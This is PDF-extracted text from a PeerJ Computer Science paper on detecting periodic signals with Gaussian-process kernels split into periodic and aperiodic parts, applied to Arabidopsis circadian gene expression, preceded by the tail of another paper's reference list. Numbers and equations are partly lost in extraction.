april ). davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ajph. . . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /science.aac http://dx.doi.org/ . / http://dx.doi.org/ . /science. . . http://redis.io/ http://dx.doi.org/ . /peerj-cs. selassie d, heller b, heer j. . divided edge bundling for directional network data. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . serrano mÁ, boguná m, vespignani a. . extracting the multiscale backbone of complex weighted networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . solem a, contributors. . celery. available at http://www.celeryproject.org/ (accessed on april ). subrahmanian v, azaria a, durst s, kagan v, galstyan a, lerman k, zhu l, ferrara e, flammini a, menczer f, stevens a, dekhtyar a, gao s, hogg t, kooti f, liu y, varol o, shiralkar p, vydiswaran v, mei q, hwang t. . the darpa twitter bot challenge. ieee computer ( ): – doi . /mc. . . tene o, polonetsky j. . privacy in the age of big data: a time for big decisions. stanford law review online : . terna p. . 
simulation tools for social scientists: building agent based models with swarm. journal of artificial societies and social simulation ( ): – . the apache software foundation. a. apache hbase. available at http://hbase. apache.org/ (accessed on april ). the apache software foundation. b. hadoop. available at http://hadoop.apache. org/ (accessed on april ). the apache software foundation. c. apache solr. available at http://lucene.apache. org/solr/ (accessed on april ). the apache software foundation. d. apache hadoop yarn. available at http: //hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/yarn.html (accessed on april ). travers j, milgram s. . an experimental study of the small world problem sociometry ( ): – . twitter, inc. . developer policy. available at https://dev.twitter.com/overview/ terms/policy. internet archive: https://web.archive.org/web/ /https: //dev.twitter.com/overview/terms/policy (accessed on september ). varol o, ferrara e, ogan c, menczer f, flammini a. . evolution of online user behavior during a social upheaval. in: proceedings of the acm web science conference (websci). new york: acm. vayena e, salathé m, madoff lc, brownstein js. . ethical challenges of big data in public health. plos computational biology ( ):e doi . /journal.pcbi. . weng l, flammini a, vespignani a, menczer f. . competition among memes in a world with limited attention. scientific reports ( ):srep doi . /srep . weng l, menczer f. . topicality and impact in social media: diverse messages, focused messengers. plos one ( ):e doi . /journal.pone. . weng l, menczer f, ahn y-y. . virality prediction and community structure in social networks. scientific reports : doi . /srep . davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /pnas. http://www.celeryproject.org/ http://dx.doi.org/ . /mc. . http://hbase.apache.org/ http://hbase.apache.org/ http://hadoop.apache.org/ http://hadoop.apache.org/ http://lucene.apache.org/solr/ http://lucene.apache.org/solr/ http://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/yarn.html http://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/yarn.html https://dev.twitter.com/overview/terms/policy https://dev.twitter.com/overview/terms/policy https://web.archive.org/web/ /https://dev.twitter.com/overview/terms/policy https://web.archive.org/web/ /https://dev.twitter.com/overview/terms/policy http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /srep http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /srep http://dx.doi.org/ . /peerj-cs. weng l, menczer f, ahn y-y. . predicting successful memes using network and community structure. in: proceedings of the eighth international aaai conference on weblogs and social media (icwsm). palo alto: aaai. weng l, ratkiewicz j, perra n, gonçalves b, castillo c, bonchi f, schifanella r, menczer f, flammini a. . the role of information diffusion in the evolution of social networks. in: proceedings of the th acm sigkdd conference on knowledge discovery and data mining (kdd). wiggins tb, gao x, qiu j. . indexedhbase. available at http://salsaproj.indiana.edu/ indexedhbase (accessed on april ). wu t-l, zhang b, davis ca, ferrara e, flammini a, menczer f, qiu j. . scalable query and analysis for social networks: an integrated high-level dataflow system with pig and harp. in: thai mt, xiong h, wu w, eds. big data in complex and social networks. boca raton: chapman and hall/crc. in press. zimmer m. . 
the twitter archive at the library of congress: challenges for informa- tion practice and information policy. first monday ( ): doi . /fm.v i . . davis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://salsaproj.indiana.edu/indexedhbase http://salsaproj.indiana.edu/indexedhbase http://dx.doi.org/ . /fm.v i . http://dx.doi.org/ . /peerj-cs. submitted october accepted february published april corresponding author nicolas durrande, durrande@emse.fr academic editor kathryn laskey additional information and declarations can be found on page doi . /peerj-cs. copyright durrande et al. distributed under creative commons cc-by . open access detecting periodicities with gaussian processes nicolas durrande , james hensman , magnus rattray and neil d. lawrence institut fayol—limos, mines saint-Étienne, saint-Étienne, france chicas, faculty of health and medicine, lancaster university, lancaster, united kingdom faculty of life sciences, university of manchester, manchester, united kingdom department of computer science and sheffield institute for translational neuroscience, university of sheffield, sheffield, united kingdom abstract we consider the problem of detecting and quantifying the periodic component of a function given noise-corrupted observations of a limited number of input/output tuples. our approach is based on gaussian process regression, which provides a flexible non-parametric framework for modelling periodic data. we introduce a novel decomposition of the covariance function as the sum of periodic and aperiodic kernels. this decomposition allows for the creation of sub-models which capture the periodic nature of the signal and its complement. to quantify the periodicity of the signal, we derive a periodicity ratio which reflects the uncertainty in the fitted sub-models. although the method can be applied to many kernels, we give a special emphasis to the matérn family, from the expression of the reproducing kernel hilbert space inner product to the implementation of the associated periodic kernels in a gaussian process toolkit. the proposed method is illustrated by considering the detection of periodically expressed genes in the arabidopsis genome. subjects data mining and machine learning, optimization theory and computation keywords rkhs, harmonic analysis, circadian rhythm, gene expression, matérn kernels introduction the periodic behaviour of natural phenomena arises at many scales, from the small wavelength of electromagnetic radiations to the movements of planets. the mathematical study of natural cycles can be traced back to the nineteenth century with thompson’s harmonic analysis for predicting tides (thomson, ) and schuster’s investigations on the periodicity of sunspots (schuster, ). amongst the methods that have been considered for detecting and extracting the periodic trend, one can cite harmonic analysis (hartley, ), folding methods (stellingwerf, ; leahy et al., ) which are mostly used in astrophysics and periodic autoregressive models (troutman, ; vecchia, ). in this article, we focus on the application of harmonic analysis in reproducing kernel hilbert spaces (rkhs) and on the consequences for gaussian process modelling. our approach provides a flexible framework for inferring both the periodic and aperiodic components of sparsely sampled and noise-corrupted data, providing a principled means for quantifying the degree of periodicity. 
we demonstrate our proposed method on the problem of identifying periodic genes in gene expression time course data, comparing performance with a popular alternative approach to this problem. how to cite this article durrande et al. ( ), detecting periodicities with gaussian processes. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:durrande@emse.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. harmonic analysis is based on the projection of a function onto a basis of periodic functions. for example, a natural method for extracting the π-periodic trend of a function f is to decompose it in a fourier series: f (x)→ fp(x)=a sin(x)+a cos(x)+a sin( x)+a cos( x)+··· ( ) where the coefficients ai are given, up to a normalising constant, by the l inner product between f and the elements of the basis. however, the phenomenon under study is often observed at a limited number of points, which means that the value of f (x) is not known for all x but only for a small set of inputs {x ,...,xn}called the observation points. with this limited knowledge of f , it is not possible to compute the integrals of the l inner product so the coefficients ai cannot be obtained directly. the observations may also be corrupted by noise, further complicating the problem. a popular approach to overcome the fact that f is partially known is to build a mathematical model m to approximate it. a good model m has to take into account as much information as possible about f . in the case of noise-free observations it interpolates f for the set of observation points m(xi)= f (xi) and its differentiability corresponds to the assumptions one can have about the regularity of f . the main body of literature tackling the issue of interpolating spatial data is scattered over three fields: (geo-)statistics (matheron, ; stein, ), functional analysis (aronszajn, ; berlinet & thomas-agnan, ) and machine learning (rasmussen & williams, ). in the statistics and machine learning framework, the solution of the interpolation problem corresponds to the expectation of a gaussian process, z, which is conditioned on the observations. in functional analysis, the problem reduces to finding the interpolator with minimal norm in a rkhs h. as many authors pointed out (for example berlinet & thomas-agnan ( ) and scheuerer, schaback & schlather ( )), the two approaches are closely related. both z and h are based on a common object which is a positive definite function of two variables k(.,.). in statistics, k corresponds to the covariance of z and for the functional counterpart, k is the reproducing kernel of h. from the regularization point of view, the two approaches are equivalent since they lead to the same model m (wahba, ). although we will focus hereafter on the rkhs framework to design periodic kernels, we will also take advantage of the powerful probabilistic interpretation offered by gaussian processes. we propose in this article to build the fourier series using the rkhs inner product instead of the l one. to do so, we extract the sub-rkhs hp of periodic functions in h and model the periodic part of f by its orthogonal projection onto hp. one major asset of this approach is to give a rigorous definition of non-periodic (or aperiodic) functions as the elements of the sub-rkhs ha=h⊥p . 
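before moving to the details of this construction, a small numerical illustration of the classical truncated fourier expansion discussed at the start of this section may help: the snippet below projects a sampled 2π-periodic function onto the first few sines and cosines using a discretised l2 inner product. it is a generic illustration, not part of the rkhs-based method proposed in the article.

```python
# numerical illustration of the truncated fourier expansion: project a sampled
# 2*pi-periodic function onto the first harmonics with a discretised l2 inner product
import numpy as np

def fourier_coefficients(f, n_harmonics=3, n_grid=2000):
    x = np.linspace(0.0, 2 * np.pi, n_grid, endpoint=False)
    fx = f(x)
    coeffs = []
    for q in range(1, n_harmonics + 1):
        a_sin = 2.0 * np.mean(fx * np.sin(q * x))  # ~ (1/pi) * integral of f(x) sin(qx) dx
        a_cos = 2.0 * np.mean(fx * np.cos(q * x))
        coeffs.append((a_sin, a_cos))
    return np.array(coeffs)

f = lambda x: np.sin(x) + 0.3 * np.cos(2 * x)
print(np.round(fourier_coefficients(f), 3))  # approximately [[1, 0], [0, 0.3], [0, 0]]
```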
the decomposition h=hp⊕ha then allows discrimination of the periodic component of the signal from the aperiodic one. although some expressions of kernels leading to rkhs of periodic functions can be found in the literature (rasmussen & williams, ), they do not allow to extract the periodic part of the signal. indeed, usual periodic kernels do not come with the expression of an aperiodic kernel. it is thus not possible to obtain a proper decomposition of the space as the direct sum of periodic and aperiodic subspaces and the periodic sub-model cannot be rigorously obtained. durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure plots of the benchmark test functions, observation points and fitted models. for an improved visibility, the plotting region is limited to one period. the rmse is computed using a grid of evenly spaced points spanning [ , ], and the values indicated on each subplot correspond respectively to cosopt, the periodic gaussian process model and linear regression. the python code used to generate this figure is provided as jupyter notebook in supplemental information . the last part of this introduction is dedicated to a motivating example. in ‘kernels of periodic and aperiodic subspaces,’ we focus on the construction of periodic and aperiodic kernels and on the associated model decomposition. ‘application to matérn kernels’ details how to perform the required computations for kernels from the matérn familly. ‘quantifying the periodicity t’ introduces a new criterion for measuring the periodicity of the signal. finally, the last section illustrates the proposed approach on a biological case study where we detect, amongst the entire genome, the genes showing a cyclic expression. the examples and the results presented in this article have been generated with the version . of the python gaussian process toolbox gpy. this toolbox, in which we have implemented the periodic kernels discussed here, can be downloaded at http://github.com/sheffieldml/gpy. furthermore, the code generating the figs. – is provided in the supplemental information as jupyter notebooks. motivating example to illustrate the challenges of determining a periodic function, we first consider a benchmark of six one dimensional periodic test functions (see fig. and appendix a). these functions include a broad variety of shapes so that we can understand the effect of shape on methods with different modelling assumptions. a set x =(x ,...,x ) of equally spaced observation points is used as training set and a n( , . ) observation noise is added to each evaluation of the test function: fi= f (xi)+εi (or f = f (x)+ε with vector durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://github.com/sheffieldml/gpy http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure examples of decompositions of a kernel as a sum of a periodic and aperiodic sub-kernels. (a) matérn / kernel k(., ). (b) periodic sub-kernel kp(., ). (c) aperiodic sub-kernel ka(., ). for these plots, one of the kernels variables is fixed to . the three graphs on each plot correspond to a different value of the lengthscale parameter `. the input space is d = [ , π] and the cut-off frequency is q = . the python code used to generate this figure is provided as jupyter notebook in supplemental informa- tion . figure decomposition of a gaussian process fit. 
(a) full model m; (b) periodic portion mp and (c) aperiodic portion ma. our decomposition allows for recognition of both periodic and aperiodic parts. in this case maximum likelihood estimation was used to determine the parameters of the kernel (σ²p, ℓp, σ²a, ℓa). the python code used to generate this figure is provided as a jupyter notebook in the supplemental information. notations). we consider three different modelling approaches to compare the facets of different approaches based on harmonic analysis:

• cosopt (straume, ), which fits cosine basis functions to the data,
• linear regression in the weights of a truncated fourier expansion,
• gaussian process regression with a periodic kernel.

cosopt. cosopt is a method that is commonly used in biostatistics for detecting periodically expressed genes (hughes et al., ; amaral & johnston, ). it assumes the following model for the signal:

y(x) = α + β cos(ωx + φ) + ε,

where ε corresponds to white noise. the parameters α, β, ω and φ are fitted by minimizing the mean square error.

linear regression. we fit a more general model with a basis of sines and cosines whose periods are successive integer fractions of the fundamental period, to account for periodic signals that do not correspond to a pure sinusoid:

y(x) = α + Σᵢ βᵢ cos(2πix) + Σᵢ γᵢ sin(2πix) + ε.

again, model parameters are fitted by minimizing the mean square error, which corresponds to linear regression over the basis weights.

gaussian process with periodic covariance function. we fit a gaussian process model with an underlying periodic kernel. we consider the model

y(x) = α + yp(x) + ε,

where yp is a gaussian process and where α should be interpreted as a gaussian random variable with zero mean and variance σ²α. the periodicity of the phenomenon is taken into account by choosing a process yp such that its samples are periodic functions. this can be achieved with a kernel such as

kp(x, x′) = σ² exp(−sin²(ω(x − x′)) / ℓ²),

or with the kernels discussed later in the article. for this example we choose the periodic matérn kernel represented in fig. b. for any kernel choice, the gaussian process regression model can be summarized by the mean and variance of the conditional distribution:

m(x) = E[y(x) | y(X) = F] = k(x, X) (k(X, X) + τ²I)⁻¹ F
v(x) = Var[y(x) | y(X) = F] = k(x, x) − k(x, X) (k(X, X) + τ²I)⁻¹ k(X, x),

where X denotes the vector of observation points, F the corresponding noisy observations, k = σ²α + kp, and I is the identity matrix whose size is the number of observation points. in this expression, we introduced matrix notation for k: if A and B are vectors of length n and m, then k(A, B) is the n × m matrix with entries k(A, B)ᵢⱼ = k(Aᵢ, Bⱼ). the parameters of the model (σ²α, σ², ℓ, τ²) can be obtained by maximum likelihood estimation.

the models fitted with cosopt, linear regression and the periodic gaussian process model are compared in fig. . it can be seen that the latter clearly outperforms the other models, since it can approximate non-sinusoidal patterns (in contrast to cosopt) while offering good noise filtering (no high-frequency oscillations corresponding to noise overfitting, as seen for linear regression). the gaussian process model gives an effective non-parametric fit to the different functions. in terms of root mean square error (rmse), in each case it is either the best performing method, or it performs nearly as well as the best performing method. both linear regression and cosopt can fail catastrophically on one or more of these examples. although highly effective for purely periodic data, the use of a periodic gaussian process is less appropriate for identifying the periodic component of a pseudo-periodic function such as the sum of a cosine and a decaying exponential trend. an alternative suggestion is
both linear regression and cosopt can fail catastrophically on one or more of these examples. although highly effective for purely periodic data, the use of a periodic gaussian processes is less appropriate for identifying the periodic component of a pseudo- periodic function such as f (x)= cos(x)+ . exp(−x). an alternative suggestion is durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. to consider a pseudo-periodic gaussian process y = y +yp with a kernel given by the sum of a usual kernel k and a periodic one kp (see e.g., rasmussen & williams, ( )). such a construction allows decomposition of the model into a sum of sub- models m(x)=e[y (x)|y(x) = f]+e[yp(x)|y(x) = f] where the latter is periodic (see ‘decomposition in periodic and aperiodic sub-models’ for more details). however, the periodic part of the signal is scattered over the two sub-models so it is not fully represented by the periodic sub-model. it would therefore be desirable to introduce new covariance structures that allow an appropriate decomposition in periodic and non-periodic sub- models in order to tackle periodicity estimation for pseudo-periodic signals. kernels of periodic and aperiodic subspaces the challenge of creating a pair of kernels that stand respectively for the periodic and aperiodic components of the signal can be tackled using the rkhs framework. we detail in this section how decomposing a rkhs into a subspace of periodic functions and its orthogonal complement leads to periodic and aperiodic sub-kernels. fourier basis in rkhs we assume in this section that the space hp spanned by a truncated fourier basis b(x)= ( sin ( π λ x ) ,...,cos ( π λ qx ))> ( ) is a subspace of the rkhs h. under this hypothesis, it is straightforward to confirm that the reproducing kernel of hp is kp(x,x ′)=b>(x)g− b(x′) ( ) where g is the gram matrix of b in h: gi,j = 〈 bi,bj 〉 h. hereafter, we will refer to kp as the periodic kernel. in practice, the computation of kp requires computation of the inner product between sine and cosine functions in h. we will see in the next section that these computa- tions can be done analytically for matérn kernels. for other kernels, a more comprehensive list of rkhs inner products can be found in berlinet & thomas-agnan ( , chap. ). the orthogonal complement of hp in h can be interpreted as a subspace ha of aperiodic functions. by construction, its kernel is ka =k−kp (berlinet & thomas-agnan, ). an illustration of the decomposition of matérn / kernels is given in fig. . the decomposition of the kernel comes with a decomposition of the associated gaussian process in to two independent processes and the overall decompositions can be summarised as follow: h=hp ⊥ +ha↔k=kp+ka↔y =yp y +ya. ( ) many stationary covariance functions depend on two parameters: a variance parameter σ , which represents the vertical scale of the process and a lengthscale parameter, `, which represents the horizontal scale of the process. the sub-kernels ka and kp inherit these parameters (through the gram matrix g for the latter). however, the decomposition k =kp+ka allows us to set the values of those parameters separately for each sub-kernel durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in order to increase the flexibility of the model. the new set of parameters of k is then (σ p ,`p,σ a ,`a) with an extra parameter λ if the period is not known. 
such reparametrisations of kp and ka induce changes in the norms of hp and ha. however, if the values of the parameters are not equal to zero or +∞, these spaces still consist of the same elements, so hp ∩ ha = ∅. this implies that the rkhs generated by kp + ka corresponds to hp + ha, where the latter are still orthogonal but endowed with a different norm. nevertheless, the approach is philosophically different since we build h by adding two spaces orthogonally, whereas previously we decomposed an existing space h into orthogonal subspaces.

decomposition in periodic and aperiodic sub-models

the expression y = yp + ya allows us to introduce two sub-models corresponding to conditional distributions: a periodic one, yp(x) | y(X) = F, and an aperiodic one, ya(x) | y(X) = F. these two distributions are gaussian and their means and variances are given by the usual gaussian process conditioning formulas:

mp(x) = E[yp(x) | y(X) = F] = kp(x, X) k(X, X)⁻¹ F
ma(x) = E[ya(x) | y(X) = F] = ka(x, X) k(X, X)⁻¹ F,

vp(x) = Var[yp(x) | y(X) = F] = kp(x, x) − kp(x, X) k(X, X)⁻¹ kp(X, x)
va(x) = Var[ya(x) | y(X) = F] = ka(x, x) − ka(x, X) k(X, X)⁻¹ ka(X, x).

the linearity of the expectation ensures that the sum of the sub-model means is equal to the full model mean:

m(x) = E[yp(x) + ya(x) | y(X) = F] = E[yp(x) | y(X) = F] + E[ya(x) | y(X) = F] = mp(x) + ma(x),

so mp and ma can be interpreted as the decomposition of m into its periodic and aperiodic components. however, there is no similar decomposition of the variance: v(x) ≠ vp(x) + va(x), since yp and ya are not independent given the observations. the sub-models can be interpreted as usual gaussian process models with correlated noise. for example, mp is the best predictor based on kernel kp with an observational noise given by ka. for a detailed discussion on the decomposition of models based on a sum of kernels, see durrande, ginsbourger & roustant ( ). we now illustrate this model decomposition on a test function consisting of a sine plus a linear trend, f(x) = sin(x) + x/c for a fixed constant c, defined over a bounded interval. figure shows the model obtained after estimating (σ²p, ℓp, σ²a, ℓa) of a decomposed matérn kernel. in this example, the estimated values of the lengthscales are very different, allowing the model to capture efficiently both the periodic component of the signal and the low-frequency trend.

application to matérn kernels

the matérn class of kernels provides a flexible class of stationary covariance functions for a gaussian process model. the family includes the infinitely smooth exponentiated quadratic (i.e., gaussian or squared exponential or radial basis function) kernel as well
for ν= / , / , / we have k / (x,x ′)=σ exp ( − |x−x′| ` ) k / (x,x ′)=σ ( + √ |x−x′| ` ) exp ( − √ |x−x′| ` ) k / (x,x ′)=σ ( + √ |x−x′| ` + |x−x′| ` ) exp ( − √ |x−x′| ` ) . ( ) here the parameters ` and σ respectively correspond to a rescaling of the abscissa and or- dinate axis. for ν= / one can recognise the expression of the exponential kernel (i.e., the covariance of the ornstein–uhlenbeck process) and the limit case ν→∞ corresponds to the squared exponential covariance function (rasmussen & williams, ). as stated in porcu & stein ( theorem . ) and wendland ( ), the rkhs generated by kν coincides with the sobolev space w ν+ / . since the elements of the fourier basis are c∞, they belong to the sobolev space and thus to matérn rkhs. the hypothesis hp⊂h made in ‘kernels of periodic and aperiodic subspaces’ is thus fulfilled and all previous results apply. furthermore, the connection between matérn kernels and autoregressive processes allows us to derive the expression of the rkhs inner product. as detailed in appendix b, we obtain for an input space d=[a,b]: matérn / (exponential kernel) 〈 g,h 〉 h / = ` σ ∫ b a ( ` g+g ′ )( ` h+h′ ) dt+ σ g(a)h(a). ( ) matérn / 〈 g,h 〉 h / = ` √ σ ∫ b a ( ` g+ √ ` g ′+g ′′ )( ` h+ √ ` h′+h′′ ) dt + σ g(a)h(a)+ ` σ g ′(a)h′(a). ( ) durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. matérn / 〈 g,h 〉 h / = ∫ b a lt (g)lt (h)dt+ σ g(a)h(a)+ ` σ g(a)′′h′′(a) + ` σ ( g ′(a)h′(a)+ g ′′(a)h(a)+ g(a)h′′(a) ) ( ) where lt (g)= √ ` √ σ ( √ ` g(t)+ ` g ′(t)+ √ ` g ′′(t)+g ′′′(t) ) . although these expressions are direct consequences of doob ( ) and hájek ( ), they cannot be found in the literature to the best of our knowledge. the knowledge of these inner products allow us to compute the gram matrix g and thus the sub-kernels kp and ka. a result of great practical interest is that inner products between the basis functions have a closed form expression. indeed, all the elements of the basis can be written in the form cos(ωx+ϕ) and, using the notation lx for the linear operators in the inner product integrals (see eq. ( )), we obtain: lx(cos(ωx+ϕ))= ∑ i αicos(ωx+ϕ) (i) = ∑ i αiω icos ( ωx+ϕ+ iπ ) . ( ) the latter can be factorised in a single cosine ρcos(ωx+φ) with ρ= √ r c +r s , φ= { arcsin(rs/ρ) if rc ≥ arcsin(rs/ρ)+π if rc < ( ) where rc = ∑ i αiω icos ( ϕ+ iπ ) and rs= ∑ i αiω isin ( ϕ+ iπ ) . eventually, the computation of the inner product between functions of the basis boils down to the integration of a product of two cosines, which can be solved by linearisation. quantifying the periodicity the decomposition of the model into a sum of sub-models is useful for quantifying the periodicity of the pseudo-periodic signals. in this section, we propose a criterion based on the ratio of signal variance explained by the sub-models. in sensitivity analysis, a common approach for measuring the effect of a set of variables x ,...,xn on the output of a multivariate function f (x ,...,xn) is to introduce a random vector r=(r ,...,rn) with values in the input space of f and to define the variance explained by a subset of variables xi = (xi ,...,xim) as vi =var ( e ( f (r)|ri )) (oakley & o’hagan, ). furthermore, the prediction variance of the gaussian process model can be taken into account by computing the indices based on random paths of the conditional gaussian process (marrel et al., ). durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
we now apply these two principles to define a periodicity ratio based on the sub-models. let R be a random variable defined over the input space and yp, ya be the periodic and aperiodic components of the conditional process y given the data-points. yp and ya are normally distributed with respective means and variances (mp, vp), (ma, va), and their covariance is given by

cov(yp(x), ya(x′)) = −kp(x, X) k(X, X)⁻¹ ka(X, x′).

to quantify the periodicity of the signal we introduce the following periodicity ratio:

S = Var_R[yp(R)] / Var_R[yp(R) + ya(R)].

note that S cannot be interpreted as the percentage of periodicity of the signal in a rigorous way, since Var_R[yp(R) + ya(R)] ≠ Var_R[yp(R)] + Var_R[ya(R)]. as a consequence, this ratio can be greater than 1. for the model shown in fig. , the mean and standard deviation of S are respectively . and . .

application to gene expression analysis

the 24 h cycle of days can be observed in the oscillations of biological mechanisms at many spatial scales. this phenomenon, called the circadian rhythm, can for example be seen at a microscopic level in gene expression changes within cells and tissues. the cellular mechanism ensuring this periodic behaviour is called the circadian clock. for arabidopsis, which is a widely used organism in plant biology and genetics, the study of the circadian clock at the gene level reveals an auto-regulatory system involving several genes (ding et al., ). as argued by edwards et al. ( ), it is believed that the genes involved in the oscillatory mechanism have a cyclic expression, so the detection of periodically expressed genes is of great interest for completing current models. within each cell, protein-coding genes are transcribed into messenger rna molecules which are used for protein synthesis. to quantify the expression of a specific protein-coding gene it is possible to measure the concentration of messenger rna molecules associated with this gene. microarray analysis and rna-sequencing are two examples of methods that take advantage of this principle. the dataset (see http://millar.bio.ed.ac.uk/data.htm) considered here was originally studied by edwards et al. ( ). it corresponds to gene expression for nine-day-old arabidopsis seedlings. after eight days under a light/dark cycle, the seedlings are transferred into constant light. a microarray analysis is performed every four hours after the last dark–light transition to monitor genome-wide gene expression. edwards et al. ( ) use cosopt (straume, ) for detecting periodic genes and identify a subset of periodically expressed genes with estimated periods of roughly one day. we now apply to this dataset the method described in the previous sections. the kernel we consider is the sum of a periodic and an aperiodic matérn kernel plus a delta function to reflect observation noise:

k(x, x′) = σ²p kp(x, x′) + σ²a ka(x, x′) + τ² δ(x, x′).
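a minimal sketch of how such a per-gene model could be fitted is given below, assuming the periodic matérn kernels available in recent versions of gpy and using matérn 3/2 covariances as an example; it is illustrative rather than the exact configuration used for the study. x holds the sampling times (in hours) as a column vector and y the corresponding expression measurements of one gene.

```python
# minimal sketch of a per-gene fit, assuming the periodic matern kernels available in
# recent gpy versions; kernel choices and settings here are illustrative
import GPy

def fit_gene_model(X, Y, n_restarts=10):
    """X: (n, 1) sampling times in hours, Y: (n, 1) expression measurements of one gene"""
    k_periodic = GPy.kern.PeriodicMatern32(input_dim=1)   # periodic component
    k_aperiodic = GPy.kern.Matern32(input_dim=1)          # aperiodic component
    model = GPy.models.GPRegression(X, Y, k_periodic + k_aperiodic)
    # the gaussian likelihood noise plays the role of the tau^2 delta term
    model.optimize_restarts(num_restarts=n_restarts, verbose=False)
    return model
```

the periodicity ratio can then be approximated by monte carlo, sampling the periodic and aperiodic components of the fitted model over the input space.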
for each gene, the values of these parameters are estimated using maximum likelihood. the optimization is based on the standard options of the gpy toolkit with the following boundary limits for the parameters: σp, σa≥ ; `p, `a∈[ , ]; τ ∈[ − , . ]and λ∈[ , ]. furthermore, random restarts are performed for each optimization to limit the effects of local minima. eventually, the periodicity of each model is assessed with the ratio s given by eq. ( ). as this ratio is a random variable, we approximate the expectation of s with the mean value of , realisations. to obtain results comparable with the original paper on this dataset, we labeled as periodic the set of , genes with the highest periodicity ratio. the cut-off periodicity ratio associated with this quantile is s= . . as can be seen in fig. , this cut-off value does not appear to be of particular significance according to the distribution of the gaussian process models. on the other hand, the distribution spike that can be seen at s= corresponds to a gap between models that are fully-periodic and others. we believe this gap is due to the maximum likelihood estimation since the estimate of σ a is zero for all models in the bin s= . the other spike at s= can be interpreted similarly and it corresponds to estimated σ p equal to zero. durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table confusion table associated to the predictions by cosopt and the proposed gaussian process approach. # of genes pgp pgp pcosopt , , pcosopt , , figure comparison of estimated periods for the genes in pgp ∩ pcosopt . the coefficient of determi- nation of x →x (dashed line) is . . let pcosopt and pgp be the sets of selected periodic genes respectively by edwards et al. ( ) and the method presented here and let pcosopt and pgp denote their complements. the overlap between these sets is summarised in table . although the results cannot be compared to any ground truth, the methods seem coherent since % of the genes share the same label. furthermore, the estimated value of the period λ is consistent for the genes labelled as periodic by the two methods, as seen in fig. . one interesting comparison between the two methods is to examine the genes that are classified differently. the available data from edwards et al. ( ) allows focusing on the worst classification mistakes made by one method according to the other. this is illustrated in fig. which shows the behaviour of the most periodically expressed genes in pgp according to cosopt and, conversely, the genes in pcosopt with the highest periodicity ratio s. although it is undeniable that the genes selected only by cosopt (fig. a) present some periodic component, they also show a strong non-periodic part, durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure examples of genes with different labels. (a) corresponds to genes labelled as periodic by cosopt but not by the gaussian process approach, whereas in (b) they are labelled as periodic only by the latter. in (a, b), the four selected genes are those with the highest periodic part according to the method that labels them as periodic. the titles of the graphs correspond to the name of the genes (agi convention). corresponding either to noise or trend. for these genes, the value of the periodicity ratio is: . ( . ), . ( . ), . ( . ), . ( . ) (means and standard deviations, clockwise from top left) which is close to the classification boundary. 
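A hedged sketch of the per-gene fitting loop with the GPy toolkit mentioned above: because the periodic/aperiodic Matérn decomposition described in this paper may not be exposed under the same kernel names in every GPy version, the sketch substitutes GPy's standard periodic kernel plus a Matérn 3/2 term, with the Gaussian likelihood playing the role of the τ²δ observation-noise term. The bounds and the number of restarts are illustrative placeholders, not the exact settings used in the paper.

```python
import GPy

def fit_gene_model(X, Y):
    """Fit a periodic + aperiodic model to one gene's time course.

    X: (n, 1) array of sampling times in hours; Y: (n, 1) expression values.
    Kernel choices, bounds and restart count are stand-ins for illustration.
    """
    k_per = GPy.kern.StdPeriodic(1)      # periodic component (circadian-like)
    k_aper = GPy.kern.Matern32(1)        # aperiodic trend component
    kernel = k_per + k_aper

    # Keep the optimiser in a plausible region (placeholder bounds).
    k_per.period.constrain_bounded(20.0, 28.0)
    k_per.lengthscale.constrain_bounded(1.0, 60.0)
    k_aper.lengthscale.constrain_bounded(1.0, 60.0)

    model = GPy.models.GPRegression(X, Y, kernel)
    # Several random restarts to limit the effect of local optima.
    model.optimize_restarts(num_restarts=5, verbose=False)
    return model
```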
on the other hand, the genes selected only by the gaussian process approach show a strong periodic signal (we have for all genes s= . ( . )) with sharp spikes. we note from fig. b that there is always at least one observation associated with each spike, which ensures that the behaviour of the gaussian process models cannot simply be interpreted as overfitting. the reason cosopt is not able to identify these signals as periodic is that it is based on a single cosine function which makes it inadequate for fitting non sinusoidal periodic functions. this is typically the case for gene expressions with spikes as in fig. b, but it can also be seen on the test functions of fig. . this comparison shows very promising results, both for the capability of the proposed method to handle large datasets and for the quality of the results. furthermore, we believe that the spike shape of the newly discovered genes may be of particular interest for understanding the mechanism of the circadian clock. the full results, as well as the original dataset, can be found in the supplemental information. conclusion the main purpose of this article is to introduce a new approach for estimating, extracting and quantifying the periodic component of a pseudo-periodic function f given some noisy observations yi = f (xi)+ε. the proposed method is typical in that it corresponds to the orthogonal projection onto a basis of periodic functions. the originality here is to perform this projection in some rkhs where the 